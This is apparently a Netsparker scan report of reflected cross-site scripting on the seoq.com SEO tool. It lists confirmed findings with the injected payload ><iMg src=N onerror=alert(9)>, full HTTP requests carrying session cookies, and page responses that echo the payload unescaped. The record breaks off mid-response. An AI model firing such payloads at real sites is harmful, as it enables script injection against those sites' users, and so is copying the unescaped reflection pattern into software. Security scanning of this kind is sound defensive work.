<div id="social-media-buttons">Share: <a href="http://www.facebook.com/share.php?u=<url>" onclick="return fbs_click()"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/facebook-share-button-seo-tool.gif" alt="share on facebook" width="30" height="31"/></a><a href="http://del.icio.us/post?url=http://www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/delicious-share-button-seo-tool.gif" alt="Share on Delicious" width="29" height="31"/></a><a href="http://www.stumbleupon.com/submit?url=www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/stumbleupon-share-button-seo-tool.gif" alt="Share on Stumble Upon" width="30" height="31"/></a><a href="http://twitter.com/home?status=SEO Quotient, online SEO tool - www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/twitter-share-button-seo-tool.gif" alt="Share on Twitter" width="29" height="31"/></a>

</div>
<div class="google_form">
<form id="cse-search-box" action="http://www.seoq.com/search-results/">
<input type="hidden" value="002680724730993913492:hys1pl1blsa" name="cx" />
<input type="hidden" value="FORID:10" name="cof" />
<input type="hidden" value="UTF-8" name="ie" />
<input type="text" id="search-google" size="" name="q" style="border: 1px solid rgb(126, 157, 185); padding: 2px;" />
<input type="submit" id="submit-google" value="Search" name="sa" />
<input type="hidden" name="siteurl" value="www.seoq.com/" />
<input type="hidden" name="siteurl" value="www.seoq.com" /></form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
</div>
</div>
<div id="navbar">
<ul id="menu"> <li><a href="http://www.seoq.com/about-seo-quotient" title="About">About Us</a></li> <li><a href="http://www.seoq.com/web/professionals" title="Directory">Directory</a></li> <li class="current_page_item"> <a href="http://www.seoq.com/quotient" title="SEO Tools">SEO Tools</a> <ul class='children'> <li class="page_item page-item-2306"><a href="/quotient/analysis" title="SEO Analysis Tool">SEO Analysis Tool</a></li> <li class="page_item page-item-2291"><a href="/searchengine-analysis/" title="Technical SEO Analysis">Technical SEO Analysis</a></li> <li class="page_item page-item-2295"><a href="/blvdstatus/" title="Real-time Web Analytics">Real-time Web Analytics</a></li> <li class="page_item page-item-2299"><a href="/webstatshq/" title="Traffic Ranking Software">Traffic Ranking Software</a></li> </ul> </li> <li><a href="http://www.seoq.com/blog" title="Blog">Blog</a></li> <li> <a href="http://www.seoq.com/7-c-of-online-marketing-seo" title="SEO Tools">7 C’s</a> <ul class='children'> <li class="page_item page-item-2244"><a href="/7-c-of-online-marketing-seo/crawlability/" title="Crawlability">Crawlability</a></li> <li class="page_item page-item-2285"><a href="/7-c-of-online-marketing-seo/credibility/" title="Credibility">Credibility</a></li> </ul> </li> <li><a href="http://www.seoq.com/web/" title="Discussions">Discussions</a></li> </ul> </div>
<div id="rss-header"><a href="http://www.seoq.com/feed/"><img width="27" height="25" alt="RSS feed" src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/rss-button-seo-tool.png" /></a></div>
<div id="secondary-menu" class="login"> <a href="http://www.seoq.com/web/users/login" title="Login">Login</a> <a href="http://www.seoq.com/web/users/register" title="Sign Up">Sign Up</a> </div> </div>
<div id="content-top-wrap">
<div id="content-bottom-wrap">
<div id="content">

<script type="text/javascript">function fbs_click() {u=location.href;t=document.title;window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}</script><script type="text/javascript" src="http://www.highcharts.com/highslide/highslide-full.min.js"></script><script type="text/javascript" src="http://www.highcharts.com/highslide/highslide.config.js" charset="utf-8"></script><link rel="stylesheet" type="text/css" href="http://www.highcharts.com/highslide/highslide.css" /><script type="text/javascript"> $(function() { $("#tabs").tabs(); }); function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/2271/><iMg src=N onerror=netsparker(9)>';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;} $(function() { $(".report").hide(); $("#highLevelReport").hide(); $("#reportDoesNotExist").show(); }); </script> <div id="reportDoesNotExist" class="ui-tabs-panel"> <div class="share-buttons"> <p></p> <div class="share"></div> </div> <div class="clear"></div> <div id="entry-summary"> <p><strong>Report not found</strong> Please check the URL.<br /><br /> URL for this report:<a href="http://www.seoq.com/quotient/2011/04/22/2271/><iMg src=N onerror=netsparker(9)>" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/04/22/2271/><iMg src=N onerror=netsparker(9)>ddd</a> </p> </div> </div> <div id="entry-summary"> <p>SEO Quotient™ website analysis of: <strong></strong><br /> URL for this report: <a href="http://www.seoq.com/quotient/2011/04/22/2271/><iMg src=N onerror=netsparker(9)>" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/04/22/2271/><iMg src=N onerror=netsparker(9)></a></p> <p>This URL has been analyzed: 0 times </p> </div><div class="report"> <div id="highLevelReport"> <div class="info-1"> <div class="grid-1"> <h3>Crawlability </h3> <div id="chart_crawlability">Crawlability Score</div> <br /> <h4>Section 1: Crawlability</h4> <p>Crawlability is how easy it is for search engine spiders and robots to get inside your website ... scan the words, photos and videos and index that information in its archives...</p> <ul><li><a href="#crawlabilityDetail">(See Crawlability details)</a></li></ul> </div> <div class="grid-1"> <h3>Credibility </h3> <div id="chart_credibility">Credibility Score</div> <br /> <h4>Section 2: Credibility</h4> <p>Credibility has a lot to do with what other people, bloggers and webmasters have to say about you. For example, the more references or citations to your website, the more credibility you have...</p> <ul><li><a href="#credibilityDetail">(See Credibility details)</a></li></ul> </div> <div class="grid-1 alpha"> <h3>Code </h3> <div id="chart_code">Code Score</div> <br /> <h4>Section 3: Code</h4> <p>Code refers to the extra emphasis you place on Content behind the scene. It involves meta tags, title tags, headings, hyperlinks, bullet lists and other techniques to bring more attention to specific words...</p> <ul><li><a href="#codeDetail">(See Code details)</a></li></ul> </div> </div> <div class="info-1"> <h3>Content </h3> <p>Content is the actual words, pictures, charts, graphs and videos you have. The only way search engines can determine how relevant you are vis-a-vis a search it to study the content on your website... </p> <table> <tr id="charts-row"> <td><div id="keywords_graph" style="width: 300px; height: 200px; margin: 0 auto"></div></td> <td><div id="doublePhrase_graph" style="width: 400px; height: 200px; margin: 0 auto"></div></td> </tr> </table> <ul><li><a href="#contentDetail">(See Content details)</a></li></ul> </div> <div class="clear"></div> </div><script type="text/javascript"> var chart_crawlability = new FusionCharts("/quotient/scores/AngularGauge.swf", "ChId1", "240", "155", "0", "1"); chart_crawlability.setDataURL("http://www.seoq.com/quotient/webanalytics/score_in_xml//Crawlability/14"); chart_crawlability.render("chart_crawlability"); var chart_credibility = new FusionCharts("/quotient/scores/AngularGauge.swf", "ChId1", "240", "155", "0", "1"); chart_credibility.setDataURL("http://www.seoq.com/quotient/webanalytics/score_in_xml//Credibility/5"); chart_credibility.render("chart_credibility"); var chart_code = new FusionCharts("/quotient/scores/AngularGauge.swf", "ChId1", "240", "155", "0", "1"); chart_code.setDataURL("http://www.seoq.com/quotient/webanalytics/score_in_xml//Code/6"); chart_code.render("chart_code");</script> <a name="crawlabilityDetail"></a><h2>Crawlability</h2> <div id="crawlabilityDetail"> <div class="share-buttons"> <p>Share this report on:</p> <div class="share"> <ul> <li><a onclick="return fbs_click()" title="facebook share" href="http://www.facebook.com/share.php?u=<url>" target="_blank"> <img src="http://www.seoq.com/quotient/img/facebook.jpg" width="28" height="28" alt="Share on Facebook" /></a> </li> <li><a href="http://twitter.com/home?status=Check my SEO at - http://www.seoq.com/quotient/2011/04/22/2271/><iMg src=N onerror=netsparker(9)>" target="_blank" title="twitter share" > <img src="http://www.seoq.com/quotient/img/twitter.jpg" width="28" height="28" alt="Share on twitter" /></a> </li> <li><a href="http://www.linkedin.com/shareArticle?mini=true&url=http%3A%2F%2Fwww.seoq.com%2Fquotient%2F2011%2F04%2F22%2F2271%2F%3E%3CiMg+src%3DN+onerror%3Dnetsparker%289%29%3E&title=SEO+Quotient%EF%BF%BD+Diagnostic+Report&summary=&source=seoq.com" target="_blank" title="linkedin share"> <img src="http://www.seoq.com/quotient/img/linkedin.jpg" width="28" height="28" alt="Share on LinkedIn" /></a> </li> <li><a href="http://digg.com/submit?phase=2&url=http://www.seoq.com/quotient/2011/04/22/2271/><iMg src=N onerror=netsparker(9)>&title=SEO Quotient� Diagnostic Report&bodytext=" target="_blank" title="digg share"> <img src="http://www.seoq.com/quotient/img/digg.jpg" width="28" height="28" alt="Share on Digg" /></a> </li> <li><a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.seoq.com%2Fquotient%2F2011%2F04%2F22%2F2271%2F%3E%3CiMg+src%3DN+onerror%3Dnetsparker%289%29%3E&title=stumbleupon_title" target="_blank" title="stumbleupon share"> <img src="http://www.seoq.com/quotient/img/stumbleupon.jpg" width="27" height="28" alt="Share on StumbleUpon" /></a> </li> <li><a href="http://technorati.com/faves?add=http://www.seoq.com/quotient/2011/04/22/2271/><iMg src=N onerror=netsparker(9)>" target="_blank" title="technorati share"> ..

- /quotient/2011/05/01/2841/%3E%3CiMg%20src=N%20onerror=alert(9)%3E

/quotient/2011/05/01/2841/%3E%3CiMg%20src=N%20onerror=alert(9)%3E CONFIRMED

http://www.seoq.com/quotient/2011/05/01/2841/%3E%3CiMg%20src=N%20onerror=alert(9)%3E

Parameters

Parameter	Type	Value
URI-BASED	Raw URI	><iMg src=N onerror=alert(9)>

Request

GET /quotient/2011/05/01/2841/%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E HTTP/1.1
Referer: http://www.seoq.com/quotient/2011/05/01/2841/www.diabeticinsiders.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: CAKEPHP=depb5rrurbed9dcocjraci6ot1; PHPSESSID=81vpd80f1tet77i3g4sh4nom04; CAKEPHP=mkgiit8dars4st0s51imtuc053
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:15:33 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=depb5rrurbed9dcocjraci6ot1; expires=Mon, 09-May-2011 02:15:33 GMT; path=/quotient
Keep-Alive: timeout=15, max=93
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><link rel="stylesheet" type="text/css" href="/quotient/css/style.css" /><script type="text/javascript">//<![CDATA[AC_FL_RunContent = 0;//]]></script> <script type="text/javascript" src="/quotient/js/jquery.js"></script> <script type="text/javascript" src="/quotient/js/jquery.validate.js"></script> <script type="text/javascript" src="/quotient/js/AC_RunActiveContent.js"></script><script type="text/javascript" src="/quotient/js/highcharts.js"></script> <script type="text/javascript" src="/quotient/js/excanvas.compiled.js"></script> <script type="text/javascript" src="/quotient/js/FusionCharts.js"></script> <script type="text/javascript" src="/quotient/js/jquery.simplemodal-1.3.5.js"></script> <script type="text/javascript" src="/quotient/js/seoq.tool.js"></script> <script type="text/javascript" src="/quotient/js/jquery-ui.min.js"></script> <script type="text/javascript" src="/quotient/js/jquery-ui-widgets.min.js"></script>
<script type="text/javascript">

</script>
</head>

<body>

<div class="wrapper">
<div id="header">
<div id="title">
<a href="http://www.seoq.com"><img alt="SEO Quotient™" title="SEO Quotient™" src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/logo-web-analyzer-tool.jpg" /></a>
</div>
<div class="top_header">
<div id="social-media-buttons">Share: <a href="http://www.facebook.com/share.php?u=<url>" onclick="return fbs_click()"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/facebook-share-button-seo-tool.gif" alt="share on facebook" width="30" height="31"/></a><a href="http://del.icio.us/post?url=http://www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/delicious-share-button-seo-tool.gif" alt="Share on Delicious" width="29" height="31"/></a><a href="http://www.stumbleupon.com/submit?url=www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/stumbleupon-share-button-seo-tool.gif" alt="Share on Stumble Upon" width="30" height="31"/></a><a href="http://twitter.com/home?status=SEO Quotient, online SEO tool - www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/twitter-share-button-seo-tool.gif" alt="Share on Twitter" width="29" height="31"/></a>

</div>
<div class="google_form">
<form id="cse-search-box" action="http://www.seoq.com/search-results/">
<input type="hidden" value="002680724730993913492:hys1pl1blsa" name="cx" />
<input type="hidden" value="FORID:10" name="cof" />
<input type="hidden" value="UTF-8" name="ie" />
<input type="text" id="search-google" size="" name="q" style="border: 1px solid rgb(126, 157, 185); padding: 2px;" />
<input type="submit" id="submit-google" value="Search" name="sa" />
<input type="hidden" name="siteurl" value="www.seoq.com/" />
<input type="hidden" name="siteurl" value="www.seoq.com" /></form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
</div>
</div>
<div id="navbar">
<ul id="menu"> <li><a href="http://www.seoq.com/about-seo-quotient" title="About">About Us</a></li> <li><a href="http://www.seoq.com/web/professionals" title="Directory">Directory</a></li> <li class="current_page_item"> <a href="http://www.seoq.com/quotient" title="SEO Tools">SEO Tools</a> <ul class='children'> <li class="page_item page-item-2306"><a href="/quotient/analysis" title="SEO Analysis Tool">SEO Analysis Tool</a></li> <li class="page_item page-item-2291"><a href="/searchengine-analysis/" title="Technical SEO Analysis">Technical SEO Analysis</a></li> <li class="page_item page-item-2295"><a href="/blvdstatus/" title="Real-time Web Analytics">Real-time Web Analytics</a></li> <li class="page_item page-item-2299"><a href="/webstatshq/" title="Traffic Ranking Software">Traffic Ranking Software</a></li> </ul> </li> <li><a href="http://www.seoq.com/blog" title="Blog">Blog</a></li> <li> <a href="http://www.seoq.com/7-c-of-online-marketing-seo" title="SEO Tools">7 C’s</a> <ul class='children'> <li class="page_item page-item-2244"><a href="/7-c-of-online-marketing-seo/crawlability/" title="Crawlability">Crawlability</a></li> <li class="page_item page-item-2285"><a href="/7-c-of-online-marketing-seo/credibility/" title="Credibility">Credibility</a></li> </ul> </li> <li><a href="http://www.seoq.com/web/" title="Discussions">Discussions</a></li> </ul> </div>
<div id="rss-header"><a href="http://www.seoq.com/feed/"><img width="27" height="25" alt="RSS feed" src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/rss-button-seo-tool.png" /></a></div>
<div id="secondary-menu" class="login"> <a href="http://www.seoq.com/web/users/login" title="Login">Login</a> <a href="http://www.seoq.com/web/users/register" title="Sign Up">Sign Up</a> </div> </div>
<div id="content-top-wrap">
<div id="content-bottom-wrap">
<div id="content">

<script type="text/javascript">function fbs_click() {u=location.href;t=document.title;window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}</script><script type="text/javascript" src="http://www.highcharts.com/highslide/highslide-full.min.js"></script><script type="text/javascript" src="http://www.highcharts.com/highslide/highslide.config.js" charset="utf-8"></script><link rel="stylesheet" type="text/css" href="http://www.highcharts.com/highslide/highslide.css" /><script type="text/javascript"> $(function() { $("#tabs").tabs(); }); function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/2841/><iMg src=N onerror=netsparker(9)>';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;} $(function() { $(".report").hide(); $("#highLevelReport").hide(); $("#reportDoesNotExist").show(); }); </script> <div id="reportDoesNotExist" class="ui-tabs-panel"> <div class="share-buttons"> <p></p> <div class="share"></div> </div> <div class="clear"></div> <div id="entry-summary"> <p><strong>Report not found</strong> Please check the URL.<br /><br /> URL for this report:<a href="http://www.seoq.com/quotient/2011/05/01/2841/><iMg src=N onerror=netsparker(9)>" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/05/01/2841/><iMg src=N onerror=netsparker(9)>ddd</a> </p> </div> </div> <div id="entry-summary"> <p>SEO Quotient™ website analysis of: <strong></strong><br /> URL for this report: <a href="http://www.seoq.com/quotient/2011/05/01/2841/><iMg src=N onerror=netsparker(9)>" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/05/01/2841/><iMg src=N onerror=netsparker(9)></a></p> <p>This URL has been analyzed: 0 times </p> </div><div class="report"> <div id="highLevelReport"> <div class="info-1"> <div class="grid-1"> <h3>Crawlability </h3> <div id="chart_crawlability">Crawlability Score</div> <br /> <h4>Section 1: Crawlability</h4> <p>Crawlability is how easy it is for search engine spiders and robots to get inside your website ... scan the words, photos and videos and index that information in its archives...</p> <ul><li><a href="#crawlabilityDetail">(See Crawlability details)</a></li></ul> </div> <div class="grid-1"> <h3>Credibility </h3> <div id="chart_credibility">Credibility Score</div> <br /> <h4>Section 2: Credibility</h4> <p>Credibility has a lot to do with what other people, bloggers and webmasters have to say about you. For example, the more references or citations to your website, the more credibility you have...</p> <ul><li><a href="#credibilityDetail">(See Credibility details)</a></li></ul> </div> <div class="grid-1 alpha"> <h3>Code </h3> <div id="chart_code">Code Score</div> <br /> <h4>Section 3: Code</h4> <p>Code refers to the extra emphasis you place on Content behind the scene. It involves meta tags, title tags, headings, hyperlinks, bullet lists and other techniques to bring more attention to specific words...</p> <ul><li><a href="#codeDetail">(See Code details)</a></li></ul> </div> </div> <div class="info-1"> <h3>Content </h3> <p>Content is the actual words, pictures, charts, graphs and videos you have. The only way search engines can determine how relevant you are vis-a-vis a search it to study the content on your website... </p> <table> <tr id="charts-row"> <td><div id="keywords_graph" style="width: 300px; height: 200px; margin: 0 auto"></div></td> <td><div id="doublePhrase_graph" style="width: 400px; height: 200px; margin: 0 auto"></div></td> </tr> </table> <ul><li><a href="#contentDetail">(See Content details)</a></li></ul> </div> <div class="clear"></div> </div><script type="text/javascript"> var chart_crawlability = new FusionCharts("/quotient/scores/AngularGauge.swf", "ChId1", "240", "155", "0", "1"); chart_crawlability.setDataURL("http://www.seoq.com/quotient/webanalytics/score_in_xml//Crawlability/14"); chart_crawlability.render("chart_crawlability"); var chart_credibility = new FusionCharts("/quotient/scores/AngularGauge.swf", "ChId1", "240", "155", "0", "1"); chart_credibility.setDataURL("http://www.seoq.com/quotient/webanalytics/score_in_xml//Credibility/5"); chart_credibility.render("chart_credibility"); var chart_code = new FusionCharts("/quotient/scores/AngularGauge.swf", "ChId1", "240", "155", "0", "1"); chart_code.setDataURL("http://www.seoq.com/quotient/webanalytics/score_in_xml//Code/6"); chart_code.render("chart_code");</script> <a name="crawlabilityDetail"></a><h2>Crawlability</h2> <div id="crawlabilityDetail"> <div class="share-buttons"> <p>Share this report on:</p> <div class="share"> <ul> <li><a onclick="return fbs_click()" title="facebook share" href="http://www.facebook.com/share.php?u=<url>" target="_blank"> <img src="http://www.seoq.com/quotient/img/facebook.jpg" width="28" height="28" alt="Share on Facebook" /></a> </li> <li><a href="http://twitter.com/home?status=Check my SEO at - http://www.seoq.com/quotient/2011/05/01/2841/><iMg src=N onerror=netsparker(9)>" target="_blank" title="twitter share" > <img src="http://www.seoq.com/quotient/img/twitter.jpg" width="28" height="28" alt="Share on twitter" /></a> </li> <li><a href="http://www.linkedin.com/shareArticle?mini=true&url=http%3A%2F%2Fwww.seoq.com%2Fquotient%2F2011%2F05%2F01%2F2841%2F%3E%3CiMg+src%3DN+onerror%3Dnetsparker%289%29%3E&title=SEO+Quotient%EF%BF%BD+Diagnostic+Report&summary=&source=seoq.com" target="_blank" title="linkedin share"> <img src="http://www.seoq.com/quotient/img/linkedin.jpg" width="28" height="28" alt="Share on LinkedIn" /></a> </li> <li><a href="http://digg.com/submit?phase=2&url=http://www.seoq.com/quotient/2011/05/01/2841/><iMg src=N onerror=netsparker(9)>&title=SEO Quotient� Diagnostic Report&bodytext=" target="_blank" title="digg share"> <img src="http://www.seoq.com/quotient/img/digg.jpg" width="28" height="28" alt="Share on Digg" /></a> </li> <li><a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.seoq.com%2Fquotient%2F2011%2F05%2F01%2F2841%2F%3E%3CiMg+src%3DN+onerror%3Dnetsparker%289%29%3E&title=stumbleupon_title" target="_blank" title="stumbleupon share"> <img src="http://www.seoq.com/quotient/img/stumbleupon.jpg" width="27" height="28" alt="Share on StumbleUpon" /></a> </li> <li><a href="http://technorati.com/faves?add=http://www.seoq.com/quotient/2011/05/01/2841/><iMg src=N onerror=netsparker(9)>" target="_blank" title="technorati share"> ..

- /quotient/2011/05/01/2840/%3E%3CiMg%20src=N%20onerror=alert(9)%3E

/quotient/2011/05/01/2840/%3E%3CiMg%20src=N%20onerror=alert(9)%3E CONFIRMED

http://www.seoq.com/quotient/2011/05/01/2840/%3E%3CiMg%20src=N%20onerror=alert(9)%3E

Parameters

Parameter	Type	Value
URI-BASED	Raw URI	><iMg src=N onerror=alert(9)>

Request

GET /quotient/2011/05/01/2840/%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E HTTP/1.1
Referer: http://www.seoq.com/quotient/2011/05/01/2840/www.ddtqioiptm.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: CAKEPHP=depb5rrurbed9dcocjraci6ot1; PHPSESSID=81vpd80f1tet77i3g4sh4nom04; CAKEPHP=mkgiit8dars4st0s51imtuc053
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:15:36 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=depb5rrurbed9dcocjraci6ot1; expires=Mon, 09-May-2011 02:15:36 GMT; path=/quotient
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><link rel="stylesheet" type="text/css" href="/quotient/css/style.css" /><script type="text/javascript">//<![CDATA[AC_FL_RunContent = 0;//]]></script> <script type="text/javascript" src="/quotient/js/jquery.js"></script> <script type="text/javascript" src="/quotient/js/jquery.validate.js"></script> <script type="text/javascript" src="/quotient/js/AC_RunActiveContent.js"></script><script type="text/javascript" src="/quotient/js/highcharts.js"></script> <script type="text/javascript" src="/quotient/js/excanvas.compiled.js"></script> <script type="text/javascript" src="/quotient/js/FusionCharts.js"></script> <script type="text/javascript" src="/quotient/js/jquery.simplemodal-1.3.5.js"></script> <script type="text/javascript" src="/quotient/js/seoq.tool.js"></script> <script type="text/javascript" src="/quotient/js/jquery-ui.min.js"></script> <script type="text/javascript" src="/quotient/js/jquery-ui-widgets.min.js"></script>
<script type="text/javascript">

</script>
</head>

<body>

<div class="wrapper">
<div id="header">
<div id="title">
<a href="http://www.seoq.com"><img alt="SEO Quotient™" title="SEO Quotient™" src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/logo-web-analyzer-tool.jpg" /></a>
</div>
<div class="top_header">
<div id="social-media-buttons">Share: <a href="http://www.facebook.com/share.php?u=<url>" onclick="return fbs_click()"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/facebook-share-button-seo-tool.gif" alt="share on facebook" width="30" height="31"/></a><a href="http://del.icio.us/post?url=http://www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/delicious-share-button-seo-tool.gif" alt="Share on Delicious" width="29" height="31"/></a><a href="http://www.stumbleupon.com/submit?url=www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/stumbleupon-share-button-seo-tool.gif" alt="Share on Stumble Upon" width="30" height="31"/></a><a href="http://twitter.com/home?status=SEO Quotient, online SEO tool - www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/twitter-share-button-seo-tool.gif" alt="Share on Twitter" width="29" height="31"/></a>

</div>
<div class="google_form">
<form id="cse-search-box" action="http://www.seoq.com/search-results/">
<input type="hidden" value="002680724730993913492:hys1pl1blsa" name="cx" />
<input type="hidden" value="FORID:10" name="cof" />
<input type="hidden" value="UTF-8" name="ie" />
<input type="text" id="search-google" size="" name="q" style="border: 1px solid rgb(126, 157, 185); padding: 2px;" />
<input type="submit" id="submit-google" value="Search" name="sa" />
<input type="hidden" name="siteurl" value="www.seoq.com/" />
<input type="hidden" name="siteurl" value="www.seoq.com" /></form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
</div>
</div>
<div id="navbar">
<ul id="menu"> <li><a href="http://www.seoq.com/about-seo-quotient" title="About">About Us</a></li> <li><a href="http://www.seoq.com/web/professionals" title="Directory">Directory</a></li> <li class="current_page_item"> <a href="http://www.seoq.com/quotient" title="SEO Tools">SEO Tools</a> <ul class='children'> <li class="page_item page-item-2306"><a href="/quotient/analysis" title="SEO Analysis Tool">SEO Analysis Tool</a></li> <li class="page_item page-item-2291"><a href="/searchengine-analysis/" title="Technical SEO Analysis">Technical SEO Analysis</a></li> <li class="page_item page-item-2295"><a href="/blvdstatus/" title="Real-time Web Analytics">Real-time Web Analytics</a></li> <li class="page_item page-item-2299"><a href="/webstatshq/" title="Traffic Ranking Software">Traffic Ranking Software</a></li> </ul> </li> <li><a href="http://www.seoq.com/blog" title="Blog">Blog</a></li> <li> <a href="http://www.seoq.com/7-c-of-online-marketing-seo" title="SEO Tools">7 C’s</a> <ul class='children'> <li class="page_item page-item-2244"><a href="/7-c-of-online-marketing-seo/crawlability/" title="Crawlability">Crawlability</a></li> <li class="page_item page-item-2285"><a href="/7-c-of-online-marketing-seo/credibility/" title="Credibility">Credibility</a></li> </ul> </li> <li><a href="http://www.seoq.com/web/" title="Discussions">Discussions</a></li> </ul> </div>
<div id="rss-header"><a href="http://www.seoq.com/feed/"><img width="27" height="25" alt="RSS feed" src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/rss-button-seo-tool.png" /></a></div>
<div id="secondary-menu" class="login"> <a href="http://www.seoq.com/web/users/login" title="Login">Login</a> <a href="http://www.seoq.com/web/users/register" title="Sign Up">Sign Up</a> </div> </div>
<div id="content-top-wrap">
<div id="content-bottom-wrap">
<div id="content">

<script type="text/javascript">function fbs_click() {u=location.href;t=document.title;window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}</script><script type="text/javascript" src="http://www.highcharts.com/highslide/highslide-full.min.js"></script><script type="text/javascript" src="http://www.highcharts.com/highslide/highslide.config.js" charset="utf-8"></script><link rel="stylesheet" type="text/css" href="http://www.highcharts.com/highslide/highslide.css" /><script type="text/javascript"> $(function() { $("#tabs").tabs(); }); function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/2840/><iMg src=N onerror=netsparker(9)>';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;} $(function() { $(".report").hide(); $("#highLevelReport").hide(); $("#reportDoesNotExist").show(); }); </script> <div id="reportDoesNotExist" class="ui-tabs-panel"> <div class="share-buttons"> <p></p> <div class="share"></div> </div> <div class="clear"></div> <div id="entry-summary"> <p><strong>Report not found</strong> Please check the URL.<br /><br /> URL for this report:<a href="http://www.seoq.com/quotient/2011/05/01/2840/><iMg src=N onerror=netsparker(9)>" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/05/01/2840/><iMg src=N onerror=netsparker(9)>ddd</a> </p> </div> </div> <div id="entry-summary"> <p>SEO Quotient™ website analysis of: <strong></strong><br /> URL for this report: <a href="http://www.seoq.com/quotient/2011/05/01/2840/><iMg src=N onerror=netsparker(9)>" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/05/01/2840/><iMg src=N onerror=netsparker(9)></a></p> <p>This URL has been analyzed: 0 times </p> </div><div class="report"> <div id="highLevelReport"> <div class="info-1"> <div class="grid-1"> <h3>Crawlability </h3> <div id="chart_crawlability">Crawlability Score</div> <br /> <h4>Section 1: Crawlability</h4> <p>Crawlability is how easy it is for search engine spiders and robots to get inside your website ... scan the words, photos and videos and index that information in its archives...</p> <ul><li><a href="#crawlabilityDetail">(See Crawlability details)</a></li></ul> </div> <div class="grid-1"> <h3>Credibility </h3> <div id="chart_credibility">Credibility Score</div> <br /> <h4>Section 2: Credibility</h4> <p>Credibility has a lot to do with what other people, bloggers and webmasters have to say about you. For example, the more references or citations to your website, the more credibility you have...</p> <ul><li><a href="#credibilityDetail">(See Credibility details)</a></li></ul> </div> <div class="grid-1 alpha"> <h3>Code </h3> <div id="chart_code">Code Score</div> <br /> <h4>Section 3: Code</h4> <p>Code refers to the extra emphasis you place on Content behind the scene. It involves meta tags, title tags, headings, hyperlinks, bullet lists and other techniques to bring more attention to specific words...</p> <ul><li><a href="#codeDetail">(See Code details)</a></li></ul> </div> </div> <div class="info-1"> <h3>Content </h3> <p>Content is the actual words, pictures, charts, graphs and videos you have. The only way search 